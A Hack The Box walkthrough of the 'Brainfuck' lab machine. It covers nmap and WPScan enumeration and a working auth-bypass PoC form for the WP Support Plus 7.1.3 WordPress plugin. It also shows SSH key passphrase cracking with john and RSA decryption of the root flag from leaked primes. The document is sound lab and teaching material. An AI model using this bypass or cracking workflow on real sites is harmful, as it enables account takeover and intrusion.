HTB - Brainfuck

Getting Root:

Nmap

# nmap -sC -sV -p- 10.10.10.17 -oA nmap/Brainfuck.allports
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-01 17:00 EDT
Nmap scan report for 10.10.10.17
Host is up (0.040s latency).
Not shown: 65530 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
|   256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_  256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp  open  smtp     Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open  pop3     Dovecot pop3d
|_pop3-capabilities: SASL(PLAIN) TOP CAPA AUTH-RESP-CODE PIPELINING UIDL RESP-CODES USER
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: ID more Pre-login ENABLE have post-login SASL-IR IDLE OK LOGIN-REFERRALS AUTH=PLAINA0001 capabilities IMAP4rev1 LITERAL+ listed
443/tcp open  ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after:  2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: Host:  brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 149.07 seconds

Enumeration

HTTPS - Port 443

Got a few interesting things from the SSL certificate: an email address (orestis@brainfuck.htb) and the hostnames brainfuck.htb and sup3rs3cr3t.brainfuck.htb.

These are possible virtual hosts.

Dirsearch brainfuck.htb

$ sudo /opt/dirsearch/dirsearch.py -u https://brainfuck.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -E
[sudo] password for kali: 

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, js, html, do, action | HTTP method: get | Threads: 30 | Wordlist size: 220521

Error Log: /opt/dirsearch/logs/errors-20-04-01_17-16-07.log

Target: https://brainfuck.htb

[17:16:27] Starting: 
[17:16:28] 200 -   22KB - /
[17:16:28] 301 -  194B  - /wp-content  ->  https://brainfuck.htb/wp-content/
[17:16:29] 301 -  194B  - /wp-includes  ->  https://brainfuck.htb/wp-includes/
[17:16:39] 301 -  194B  - /wp-admin  ->  https://brainfuck.htb/wp-admin/

Task Completed

WPScan

wpscan --url https://brainfuck.htb --disable-tls-checks -e
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.11
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: https://brainfuck.htb/ [10.10.10.17]
[+] Started: Wed Apr  1 19:47:50 2020

Interesting Finding(s):

[i] Plugin(s) Identified:

[+] wp-support-plus-responsive-ticket-system
 | Location: https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/
 | Last Updated: 2019-09-03T07:57:00.000Z
 | [!] The version is out of date, the latest version is 9.1.2
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 7.1.3 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - https://brainfuck.htb/wp-content/plugins/wp-support-plus-responsive-ticket-system/readme.txt



[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] administrator
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Users found: admin, administrator. Plugin found: WP Support Plus Responsive Ticket System, version 7.1.3.

Searchsploit

searchsploit wp support plus
------------------------------------------------------------------------------------------ ----------------------------------
 Exploit Title                                                                            |  Path
                                                                                          | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------ ----------------------------------
WordPress Plugin WP Support Plus Responsive Ticket System 2.0 - Multiple Vulnerabilities  | exploits/php/webapps/34589.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation    | exploits/php/webapps/41006.txt
WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection           | exploits/php/webapps/40939.txt
------------------------------------------------------------------------------------------ ----------------------------------

Using the privilege escalation PoC (41006.txt), I modified its form with the information gathered during enumeration: the administrator username and the email address from the certificate.

2. Proof of Concept

<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="administrator">
        <input type="hidden" name="email" value="orestis@brainfuck.htb">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>

https://10.10.10.17/8ba5aa10e915218697d1c658cdee0bb8/orestis/id_rsa

Cracking the id_rsa key passphrase

# /usr/share/john/ssh2john.py id_rsa > ssh_key_to_crack.txt

# john --wordlist=/home/kali/HackTheBox/Tools/rockyou.txt ssh_key_to_crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
3poulakia!       (id_rsa)
1g 0:00:00:05 DONE (2020-04-01 22:52) 0.1680g/s 2410Kp/s 2410Kc/s 2410KC/sa6_123..*7¡Vamos!
Session completed

Exploitation

# chmod 600 id_rsa 
# ssh -i id_rsa orestis@brainfuck.htb
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-75-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


You have mail.
Last login: Wed May  3 19:46:00 2017 from 10.10.11.4
orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)
orestis@brainfuck:~$

Privilege Escalation

# ls
debug.txt  encrypt.sage  mail  output.txt  user.txt

# cat output.txt
Encrypted Password: 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182

# cat debug.txt
7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997

# cat encrypt.sage
nbits = 1024

password = open("/root/root.txt").read().strip()
enc_pass = open("output.txt","w")
debug = open("debug.txt","w")
# the flag is hex-encoded and read as one big integer (Python 2 .encode('hex'))
m = Integer(int(password.encode('hex'),16))

# two 512-bit primes give a 1024-bit modulus
p = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
q = random_prime(2^floor(nbits/2)-1, lbound=2^floor(nbits/2-1), proof=False)
n = p*q
phi = (p-1)*(q-1)
# random public exponent, retried until it is invertible mod phi
e = ZZ.random_element(phi)
while gcd(e, phi) != 1:
    e = ZZ.random_element(phi)

c = pow(m, e, n)
enc_pass.write('Encrypted Password: '+str(c)+'\n')
# p, q and e are written to debug.txt: with these the private exponent is trivially recovered
debug.write(str(p)+'\n')
debug.write(str(q)+'\n')
debug.write(str(e)+'\n')

Root

Running this script recovers the clear text, which is the root flag. Because p, q and e were written to debug.txt, the private exponent d is simply the inverse of e modulo (p-1)(q-1). (Python 3; Crypto is the pycryptodome package.)

from Crypto.Util.number import inverse, long_to_bytes

p = 7493025776465062819629921475535241674460826792785520881387158343265274170009282504884941039852933109163193651830303308312565580445669284847225535166520307
q = 7020854527787566735458858381555452648322845008266612906844847937070333480373963284146649074252278753696897245898433245929775591091774274652021374143174079
e = 30802007917952508422792869021689193927485016332713622527025219105154254472344627284947779726280995431947454292782426313255523137610532323813714483639434257536830062768286377920010841850346837238015571464755074669373110411870331706974573498912126641409821855678581804467608824177508976254759319210955977053997
ct = 44641914821074071930297814589851746700593470770417111804648920018396305246956127337150936081144106405284134845851392541080862652386840869768622438038690803472550278042463029816028777378141217023336710545449512973950591755053735796799773369044083673911035030605581144977552865771395578778515514288930832915182
n = p * q
phin = (p-1)*(q-1)          # Euler's totient of n
d = inverse(e, phin)        # private exponent
pt = pow(ct, d, n)          # m = c^d mod n
# encrypt.sage built m from the hex-encoded flag, so the integer's bytes are the text
print(long_to_bytes(pt).decode())
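The same recovery as a self-contained Python 3 function (added here; not the writeup's own code), generalised to check the two assumptions encrypt.sage relies on, and exercised against constructed demo primes rather than the box's values:

```python
import math


def private_exponent_exists(p: int, q: int, e: int) -> bool:
    """True when e is invertible mod phi(n), i.e. a private exponent d exists.

    encrypt.sage enforces this with its gcd loop; an e that fails it could not
    have been used to encrypt, and cannot be used to decrypt.
    """
    return math.gcd(e, (p - 1) * (q - 1)) == 1


def recover_plaintext(p: int, q: int, e: int, c: int) -> bytes:
    """Recover m from c = m^e mod n given the leaked p, q and e (debug.txt)."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if not private_exponent_exists(p, q, e):
        raise ValueError("e is not invertible mod phi(n)")
    if not 0 <= c < n:
        raise ValueError("ciphertext is not reduced mod n")
    d = pow(e, -1, phi)      # modular inverse (Python 3.8+)
    m = pow(c, d, n)
    # encrypt.sage built m from the hex encoding of the flag, so the integer's
    # big-endian bytes are the original text (leading NUL bytes would be lost)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def encrypt_like_sage(message: bytes, p: int, q: int, e: int) -> int:
    """Mirror of encrypt.sage: m = int(message.hex(), 16); c = m^e mod n."""
    m = int(message.hex(), 16)
    n = p * q
    if m >= n:
        raise ValueError("message does not fit under the modulus")
    return pow(m, e, n)


# Constructed demo parameters (not the box's values): the Mersenne primes
# M89 and M61, and e = 65537, which is coprime to (p-1)(q-1) for this pair.
P_DEMO = (1 << 89) - 1
Q_DEMO = (1 << 61) - 1
E_DEMO = 65537

if __name__ == "__main__":
    flag = b"constructed-flag"          # constructed sample, 16 bytes < n
    ct = encrypt_like_sage(flag, P_DEMO, Q_DEMO, E_DEMO)
    print(recover_plaintext(P_DEMO, Q_DEMO, E_DEMO, ct).decode())
```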
